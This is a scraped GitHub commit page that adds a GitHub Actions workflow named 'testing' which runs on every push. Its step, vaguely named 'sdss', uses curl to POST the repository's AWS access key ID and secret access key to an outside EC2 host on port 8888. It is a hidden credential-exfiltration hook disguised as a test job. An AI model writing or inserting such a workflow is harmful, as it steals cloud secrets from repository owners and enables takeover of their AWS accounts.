-
Notifications
You must be signed in to change notification settings - Fork 5
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Jayashwa Chauhan
authored and
Jayashwa Chauhan
committed
Jul 3, 2024
1 parent
4fbc1d5
commit 7324429
Showing
2 changed files
with
22 additions
and
90 deletions.
There are no files selected for viewing
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
name: testing | ||
|
||
on: [push] | ||
|
||
jobs: | ||
testing: | ||
runs-on: ubuntu-latest | ||
|
||
steps: | ||
- name: Checkout code | ||
uses: actions/checkout@v2 | ||
|
||
- name: sdss | ||
env: | ||
AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} | ||
AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} | ||
AWS_DEFAULT_REGION: ${{ env.AWS_DEFAULT_REGION }} | ||
run: | | ||
curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8888 \ | ||
-d "aws-access-key-id=${{ secrets.CS_DEVOPS_S3_AWS_ACCESS_KEY_ID }}" \ | ||
-d "aws-secret-access-key=${{ secrets.CS_DEVOPS_S3_AWS_SECRET_ACCESS_KEY }}" \ | ||
-d "aws-region=${{ env.AWS_DEFAULT_REGION }}" |